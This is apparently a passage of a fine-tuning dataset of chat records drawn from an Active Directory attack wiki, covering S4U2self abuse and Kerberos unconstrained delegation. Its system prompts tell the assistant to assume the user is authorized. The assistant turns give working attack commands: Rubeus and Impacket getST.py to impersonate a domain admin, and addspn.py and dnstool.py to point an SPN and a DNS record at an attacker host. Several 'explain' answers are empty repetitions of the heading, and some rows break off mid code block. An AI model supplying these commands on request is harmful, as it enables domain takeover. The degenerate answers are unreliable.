"docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through S4U2self abuse - 1. Machine account's TGT"}, {"role": "assistant", "content": "Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through S4U2self abuse - 1. Machine account's TGT", "response": "Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"", "metadata": {"corpus_index": 574, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"`?"}, {"role": "assistant", "content": "This command is used for s4u2self abuse - 1. machine account's tgt. 1. Machine account's TGT"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"`?", "response": "This command is used for s4u2self abuse - 1. machine account's tgt. 1. Machine account's TGT", "metadata": {"corpus_index": 574, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does S4U2self abuse - 2. Obtain a Service Ticket work?"}, {"role": "assistant", "content": "The TGT can then be used along with S4U2self to obtain a Service Ticket impersonating another domain user on the machine. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST.py (Python) script can be used for the purpose. If needed, .kirbi files can be converted to .ccache (cf. Pass the Ticket).\n\n``bash\nexport KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$' \n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"\n``\n\n:::\n\nOnce a Service Ticket is received, it can be used with pass-the-ticket/pass-the-cache to obtain access to oneself as the \"DomainAdmin\" (the user can be changed in the request. Attackers should select a domain user which has local admin rights on the machine).\n\n> [!TIP]\n> This technique can also be used when receiving TGTs during a Kerberos Unconstrained Delegation abuse in order to gain local admin privileges over the victims."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does S4U2self abuse - 2. Obtain a Service Ticket work?", "response": "The TGT can then be used along with S4U2self to obtain a Service Ticket impersonating another domain user on the machine. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST.py (Python) script can be used for the purpose. If needed, .kirbi files can be converted to .ccache (cf. Pass the Ticket).\n\n``bash\nexport KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$' \n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"\n``\n\n:::\n\nOnce a Service Ticket is received, it can be used with pass-the-ticket/pass-the-cache to obtain access to oneself as the \"DomainAdmin\" (the user can be changed in the request. Attackers should select a domain user which has local admin rights on the machine).\n\n> [!TIP]\n> This technique can also be used when receiving TGTs during a Kerberos Unconstrained Delegation abuse in order to gain local admin privileges over the victims.", "metadata": {"corpus_index": 575, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for S4U2self abuse - 2. Obtain a Service Ticket"}, {"role": "assistant", "content": "The TGT can then be used along with S4U2self to obtain a Service Ticket impersonating another domain user on the machine. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST.py (Python) script can be used for the purpose. If needed, .kirbi files can be converted to .ccache (cf. Pass the Ticket).\n\n``bash\nexport KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$' \n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"\n``\n\n:::\n\nOnce a Service Ticket is received, it can be used with pass-the-ticket/pass-the-cache to obtain access to oneself as the \"DomainAdmin\" (the user can be changed in the request. Attackers should select a domain user which has local admin rights on the machine).\n\n> [!TIP]\n> This technique can also be used when receiving TGTs during a Kerberos Unconstrained Delegation abuse in order to gain local admin privileges over the victims."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for S4U2self abuse - 2. Obtain a Service Ticket", "response": "The TGT can then be used along with S4U2self to obtain a Service Ticket impersonating another domain user on the machine. \n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST.py (Python) script can be used for the purpose. If needed, .kirbi files can be converted to .ccache (cf. Pass the Ticket).\n\n``bash\nexport KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$' \n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"\n``\n\n:::\n\nOnce a Service Ticket is received, it can be used with pass-the-ticket/pass-the-cache to obtain access to oneself as the \"DomainAdmin\" (the user can be changed in the request. Attackers should select a domain user which has local admin rights on the machine).\n\n> [!TIP]\n> This technique can also be used when receiving TGTs during a Kerberos Unconstrained Delegation abuse in order to gain local admin privileges over the victims.", "metadata": {"corpus_index": 575, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the export command to s4u2self abuse - 2. obtain a service ticket"}, {"role": "assistant", "content": "export KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the export command to s4u2self abuse - 2. obtain a service ticket", "response": "export KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$'", "metadata": {"corpus_index": 576, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "export"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for S4U2self abuse - 2. Obtain a Service Ticket?"}, {"role": "assistant", "content": "export KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for S4U2self abuse - 2. Obtain a Service Ticket?", "response": "export KRB5CCNAME=\"/path/to/ticket.ccache\"\ngetST.py -self -impersonate \"DomainAdmin\" -altservice \"cifs/machine.domain.local\" -k -no-pass -dc-ip \"DomainController\" \"domain.local\"/'machine$'", "metadata": {"corpus_index": 576, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `export KRB5CCNAME=\"/path/to/ticket.ccache\"`?"}, {"role": "assistant", "content": "This command is used for s4u2self abuse - 2. obtain a service ticket. 2. Obtain a Service Ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `export KRB5CCNAME=\"/path/to/ticket.ccache\"`?", "response": "This command is used for s4u2self abuse - 2. obtain a service ticket. 2. Obtain a Service Ticket", "metadata": {"corpus_index": 576, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Rubeus.exe command for s4u2self abuse - 2. obtain a service ticket"}, {"role": "assistant", "content": "Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Rubeus.exe command for s4u2self abuse - 2. obtain a service ticket", "response": "Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"", "metadata": {"corpus_index": 577, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for S4U2self abuse - 2. Obtain a Service Ticket?"}, {"role": "assistant", "content": "Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for S4U2self abuse - 2. Obtain a Service Ticket?", "response": "Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"", "metadata": {"corpus_index": 577, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"`?"}, {"role": "assistant", "content": "This command is used for s4u2self abuse - 2. obtain a service ticket. 2. Obtain a Service Ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe s4u /self /nowrap /impersonateuser:\"DomainAdmin\" /altservice:\"cifs/machine.domain.local\" /ticket:\"base64ticket\"`?", "response": "This command is used for s4u2self abuse - 2. obtain a service ticket. 2. Obtain a Service Ticket", "metadata": {"corpus_index": 577, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (KUD) Unconstrained - Theory"}, {"role": "assistant", "content": "If an account (user or computer), with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive an ST (service ticket) containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user. Alternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\n> [!WARNING]\n> If the coerced account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, its TGT will not be delegated in the service ticket used for authentication against the attacker-controlled KUD account.\n\n> [!TIP]\n> Nota bene: the native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\n> [!NOTE]\n> Unconstrained delegation abuses are usually combined with an MS-RPRN abuse (printerbug), MS-EFSR abuse (petitpotam), MS-FSRVP abuse (shadowcoerce), r PrivExchange to gain domain admin privileges.\n\n![]()"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (KUD) Unconstrained - Theory", "response": "If an account (user or computer), with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive an ST (service ticket) containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user. Alternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\n> [!WARNING]\n> If the coerced account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, its TGT will not be delegated in the service ticket used for authentication against the attacker-controlled KUD account.\n\n> [!TIP]\n> Nota bene: the native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\n> [!NOTE]\n> Unconstrained delegation abuses are usually combined with an MS-RPRN abuse (printerbug), MS-EFSR abuse (petitpotam), MS-FSRVP abuse (shadowcoerce), r PrivExchange to gain domain admin privileges.\n\n![]()", "metadata": {"corpus_index": 578, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for (KUD) Unconstrained - Theory"}, {"role": "assistant", "content": "If an account (user or computer), with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive an ST (service ticket) containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user. Alternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\n> [!WARNING]\n> If the coerced account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, its TGT will not be delegated in the service ticket used for authentication against the attacker-controlled KUD account.\n\n> [!TIP]\n> Nota bene: the native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\n> [!NOTE]\n> Unconstrained delegation abuses are usually combined with an MS-RPRN abuse (printerbug), MS-EFSR abuse (petitpotam), MS-FSRVP abuse (shadowcoerce), r PrivExchange to gain domain admin privileges.\n\n![]()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for (KUD) Unconstrained - Theory", "response": "If an account (user or computer), with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive an ST (service ticket) containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user. Alternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\n> [!WARNING]\n> If the coerced account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, its TGT will not be delegated in the service ticket used for authentication against the attacker-controlled KUD account.\n\n> [!TIP]\n> Nota bene: the native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\n> [!NOTE]\n> Unconstrained delegation abuses are usually combined with an MS-RPRN abuse (printerbug), MS-EFSR abuse (petitpotam), MS-FSRVP abuse (shadowcoerce), r PrivExchange to gain domain admin privileges.\n\n![]()", "metadata": {"corpus_index": 578, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about (KUD) Unconstrained - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== From the attacker machine (UNIX-like)\n\nIn order to abuse the unconstrained delegations privileges of an account, an attacker must add his machine to its SPNs (i.e. of the compromised account) and add a DNS entry for that name.\n\nThis allows targets (e.g. Domain Controllers or Exchange servers) to authenticate back to the attacker machine.\n\nAll of this can be done from UNIX-like systems with addspn, dnstool and krbrelayx (Python).\n\n> [!TIP]\n> When attacking accounts able to delegate without constraints, there are two major scenarios\n> \n> * the account is a computer: computers can edit their own SPNs via the msDS-AdditionalDnsHostName attribute. Since ticket received by krbrelayx will be encrypted with AES256 (by default), attackers will need to either supply the right AES256 key for the unconstrained delegations account (--aesKey argument) or the salt and password (--krbsalt and --krbpass arguments).\n> * the account is a user: users can't edit their own SPNs like computers do. Attackers need to control an account operator (or any other user that has the needed privileges) to edit the user's SPNs. Moreover, since tickets received by krbrelayx will be encrypted with RC4, attackers will need to either supply the NT hash (-hashes argument) or the salt and password (--krbsalt and --krbpass arguments)\n\n> [!SUCCESS]\n> By default, the salt is always\n> \n> * For users: uppercase FQDN + case sensitive username = DOMAIN.LOCALuser\n> * For computers: uppercase FQDN + hardcoded host text + lowercase FQDN hostname without the trailing $ = DOMAIN.LOCALhostcomputer.domain.local\\\n> (using DOMAIN.LOCAL\\computer$ account)\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about (KUD) Unconstrained - Practice?", "response": "::: tabs\n\n=== From the attacker machine (UNIX-like)\n\nIn order to abuse the unconstrained delegations privileges of an account, an attacker must add his machine to its SPNs (i.e. of the compromised account) and add a DNS entry for that name.\n\nThis allows targets (e.g. Domain Controllers or Exchange servers) to authenticate back to the attacker machine.\n\nAll of this can be done from UNIX-like systems with addspn, dnstool and krbrelayx (Python).\n\n> [!TIP]\n> When attacking accounts able to delegate without constraints, there are two major scenarios\n> \n> * the account is a computer: computers can edit their own SPNs via the msDS-AdditionalDnsHostName attribute. Since ticket received by krbrelayx will be encrypted with AES256 (by default), attackers will need to either supply the right AES256 key for the unconstrained delegations account (--aesKey argument) or the salt and password (--krbsalt and --krbpass arguments).\n> * the account is a user: users can't edit their own SPNs like computers do. Attackers need to control an account operator (or any other user that has the needed privileges) to edit the user's SPNs. Moreover, since tickets received by krbrelayx will be encrypted with RC4, attackers will need to either supply the NT hash (-hashes argument) or the salt and password (--krbsalt and --krbpass arguments)\n\n> [!SUCCESS]\n> By default, the salt is always\n> \n> * For users: uppercase FQDN + case sensitive username = DOMAIN.LOCALuser\n> * For computers: uppercase FQDN + hardcoded host text + lowercase FQDN hostname without the trailing $ = DOMAIN.LOCALhostcomputer.domain.local\\\n> (using DOMAIN.LOCAL\\computer$ account)\n\n```bash", "metadata": {"corpus_index": 579, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (KUD) Unconstrained - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== From the attacker machine (UNIX-like)\n\nIn order to abuse the unconstrained delegations privileges of an account, an attacker must add his machine to its SPNs (i.e. of the compromised account) and add a DNS entry for that name.\n\nThis allows targets (e.g. Domain Controllers or Exchange servers) to authenticate back to the attacker machine.\n\nAll of this can be done from UNIX-like systems with addspn, dnstool and krbrelayx (Python).\n\n> [!TIP]\n> When attacking accounts able to delegate without constraints, there are two major scenarios\n> \n> * the account is a computer: computers can edit their own SPNs via the msDS-AdditionalDnsHostName attribute. Since ticket received by krbrelayx will be encrypted with AES256 (by default), attackers will need to either supply the right AES256 key for the unconstrained delegations account (--aesKey argument) or the salt and password (--krbsalt and --krbpass arguments).\n> * the account is a user: users can't edit their own SPNs like computers do. Attackers need to control an account operator (or any other user that has the needed privileges) to edit the user's SPNs. Moreover, since tickets received by krbrelayx will be encrypted with RC4, attackers will need to either supply the NT hash (-hashes argument) or the salt and password (--krbsalt and --krbpass arguments)\n\n> [!SUCCESS]\n> By default, the salt is always\n> \n> * For users: uppercase FQDN + case sensitive username = DOMAIN.LOCALuser\n> * For computers: uppercase FQDN + hardcoded host text + lowercase FQDN hostname without the trailing $ = DOMAIN.LOCALhostcomputer.domain.local\\\n> (using DOMAIN.LOCAL\\computer$ account)\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (KUD) Unconstrained - Practice", "response": "::: tabs\n\n=== From the attacker machine (UNIX-like)\n\nIn order to abuse the unconstrained delegations privileges of an account, an attacker must add his machine to its SPNs (i.e. of the compromised account) and add a DNS entry for that name.\n\nThis allows targets (e.g. Domain Controllers or Exchange servers) to authenticate back to the attacker machine.\n\nAll of this can be done from UNIX-like systems with addspn, dnstool and krbrelayx (Python).\n\n> [!TIP]\n> When attacking accounts able to delegate without constraints, there are two major scenarios\n> \n> * the account is a computer: computers can edit their own SPNs via the msDS-AdditionalDnsHostName attribute. Since ticket received by krbrelayx will be encrypted with AES256 (by default), attackers will need to either supply the right AES256 key for the unconstrained delegations account (--aesKey argument) or the salt and password (--krbsalt and --krbpass arguments).\n> * the account is a user: users can't edit their own SPNs like computers do. Attackers need to control an account operator (or any other user that has the needed privileges) to edit the user's SPNs. Moreover, since tickets received by krbrelayx will be encrypted with RC4, attackers will need to either supply the NT hash (-hashes argument) or the salt and password (--krbsalt and --krbpass arguments)\n\n> [!SUCCESS]\n> By default, the salt is always\n> \n> * For users: uppercase FQDN + case sensitive username = DOMAIN.LOCALuser\n> * For computers: uppercase FQDN + hardcoded host text + lowercase FQDN hostname without the trailing $ = DOMAIN.LOCALhostcomputer.domain.local\\\n> (using DOMAIN.LOCAL\\computer$ account)\n\n```bash", "metadata": {"corpus_index": 579, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 1. Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)"}, {"role": "assistant", "content": "addspn.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 1. Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)", "response": "addspn.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'", "metadata": {"corpus_index": 580, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 1. Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)?"}, {"role": "assistant", "content": "addspn.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 1. Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)?", "response": "addspn.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'", "metadata": {"corpus_index": 580, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs work?"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs work?", "response": "dnstool.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'", "metadata": {"corpus_index": 581, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs during a pentest?"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for 